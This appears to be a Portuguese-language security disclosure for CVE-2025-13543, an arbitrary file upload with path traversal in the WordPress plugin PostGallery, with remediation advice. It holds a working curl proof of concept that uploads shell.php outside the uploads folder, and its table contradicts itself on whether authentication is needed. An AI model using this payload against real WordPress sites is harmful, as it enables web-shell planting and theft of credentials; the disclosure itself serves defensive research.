
Disclosure for CVE-2025-13543
Divulgação para CVE-2025-13543
Este repositório divulga uma vulnerabilidade descoberta no PostGallery <= 1.12.5, plugin WordPress desenvolvido por rtowebsites.
| CVE ID | Tipo | Componente | Impacto |
|---|---|---|---|
| CVE-2025-13543 | Upload Arbitrário de Arquivo Autenticado (Assinante+) | lib/ajax-actions/imageUpload.php admin/PostGalleryUploader.php | Atacante não autenticado pode fazer upload de arquivo arbitrário |
postgalleryAjaxUpload) e backend PostGalleryUploadercurl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
-F "action=postgalleryAjaxUpload" \
-F "postid=1" \
-F "uploadFolder=../../../" \
-F "name=shell.php" \
-F "[email protected];type=application/x-php"
wp-config.php e credenciais do banco de dados, implantação de backdoors persistentes e criação de contas de administrador falsas.lib/ajax-actions/imageUpload.php, aplicar autorização adequada (por exemplo, exigir current_user_can('upload_files')) e validar um nonce criptográfico antes de processar uploads.admin/PostGalleryUploader.php, restringir estritamente uploadFolder a um subdiretório conhecido de wp-content/uploads/gallery, rejeitar qualquer valor contendo ../ ou caminhos absolutos, e normalizar caminhos antes do uso.wp_handle_upload() / wp_check_filetype_and_ext(), e restringir uploads a uma lista branca de tipos de mídia não executáveis, bloqueando explicitamente .php e outras extensões executáveis em diretórios acessíveis pela web.Não imaginava que existissem vulnerabilidades tão parecidas com CTF... Além do upload arbitrário de arquivos já ser grave, ter travessia de diretório é desesperador. Foi muito divertido reproduzir a vulnerabilidade.
Nome: MooseLove
Função: Pesquisador de segurança independente / caçador de bugs
Contato: Disponível mediante solicitação
Este aviso é fornecido para conscientização pública de segurança. Livre para compartilhar com atribuição.